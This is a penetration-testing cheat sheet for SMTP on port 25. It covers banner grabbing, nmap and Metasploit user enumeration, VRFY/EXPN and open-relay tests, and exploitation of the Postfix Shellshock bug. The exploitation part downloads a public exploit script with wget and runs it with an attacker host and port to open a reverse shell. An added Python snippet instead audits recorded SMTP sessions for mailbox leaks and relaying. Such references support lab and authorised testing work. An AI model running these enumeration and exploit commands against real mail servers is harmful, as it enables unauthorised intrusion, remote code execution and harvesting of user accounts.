SMTP 25
SMTP Banner Grabbing
Using Netcat
nc -nv <target_ip> 25
Commands to test SMTP functionality:
VRFY root
VRFY test
Using Telnet
telnet <target_ip> 25
Nmap Enumeration
Common Nmap SMTP Scripts
locate .nse | grep smtp
Run the following Nmap command:
nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 <target_ip>
Scan for all SMTP-related scripts:
sudo nmap --script "smtp-*" -p 25 <target_ip>
Metasploit Enumeration
Enumerate Users
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS <target_ip>
run
Exploitation
Postfix Shellshock Vulnerability
Using SearchSploit
sudo searchsploit -m linux/remote/34896.py
Run the exploit:
python2 34896.py <target_ip>
Using the Automated Script from GitHub
Download the script:
wget https://raw.githubusercontent.com/3mrgnc3/pentest_old/master/postfix-shellshock-nc.py
Set permissions and execute:
sudo chmod +x postfix-shellshock-nc.py
python2 postfix-shellshock-nc.py <target_ip> <valid-email> <lhost> <lport>
Example:
python2 postfix-shellshock-nc.py 10.11.1.231 useradm@mail.local 192.168.119.177 1234
Common Tests for Enumeration
Test for Open Relay
Manually test with Netcat or Telnet:
MAIL FROM:<test@test.com>
RCPT TO:<target@victim.com>
DATA
This is a test message.
.
QUIT
Test for VRFY Command
Use:
VRFY <username>
Test for EXPN Command
EXPN <username>
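How to read the replies to the tests above when auditing a mail server you administer, as an added example that is not part of the original page: it parses a recorded session (including multi-line `250-` replies) and flags VRFY/EXPN replies that confirm a mailbox and RCPT replies that accept an external domain. The function names, the `C:`/`S:` transcript layout, the `example.*` domains and both transcripts are constructed for illustration.

```python
import re
# Reply line per RFC 5321: 3-digit code, then '-' (more lines follow) or ' ' (final line).
REPLY = re.compile(r"^(\d{3})([ -])(.*)$")

def parse_session(transcript):
    """Pair each client command with the final reply code the server gave it."""
    pairs, cmd = [], "<banner>"
    for line in transcript.splitlines():
        if line.startswith("C: "):
            cmd = line[3:].strip()
        elif line.startswith("S: "):
            m = REPLY.match(line[3:])
            if m and m.group(2) == " ":   # skip "250-" continuation lines
                pairs.append((cmd, int(m.group(1))))
    return pairs

def audit(transcript, local_domains):
    """250/251 on VRFY/EXPN confirms a mailbox (252 and 502 disclose nothing);
    2xx on RCPT for a domain the server does not host means relaying."""
    findings = []
    for cmd, code in parse_session(transcript):
        verb = (cmd.split() or [""])[0].upper()
        if verb in ("VRFY", "EXPN") and code in (250, 251):
            findings.append(f"{verb} confirms mailbox: {cmd.split(maxsplit=1)[-1]}")
        elif verb == "RCPT" and 200 <= code < 300:
            domain = cmd.rsplit("@", 1)[-1].rstrip(">").lower()
            if domain not in local_domains:
                findings.append(f"relay accepted for external domain: {domain}")
    return findings

# Constructed sample sessions (not captured from a real host).
WEAK = """\
C: EHLO audit.example.org
S: 250-mail.example.test
S: 250 VRFY
C: VRFY root
S: 250 2.0.0 root
C: MAIL FROM:<a@example.org>
S: 250 2.1.0 Ok
C: RCPT TO:<b@example.net>
S: 250 2.1.5 Ok
"""
HARDENED = """\
C: VRFY root
S: 502 5.5.1 VRFY command is disabled
C: MAIL FROM:<a@example.org>
S: 250 2.1.0 Ok
C: RCPT TO:<b@example.net>
S: 554 5.7.1 <b@example.net>: Relay access denied
"""
```

On Postfix, `disable_vrfy_command = yes` and `reject_unauth_destination` in `smtpd_relay_restrictions` give the behaviour shown in the second transcript.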
Useful Tools
Automated SMTP Enumeration Scripts
smtp-user-enum:
smtp-user-enum -M VRFY -U usernames.txt -t <target_ip>
Metasploit for User Enumeration:
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS <target_ip>
set USER_FILE usernames.txt
run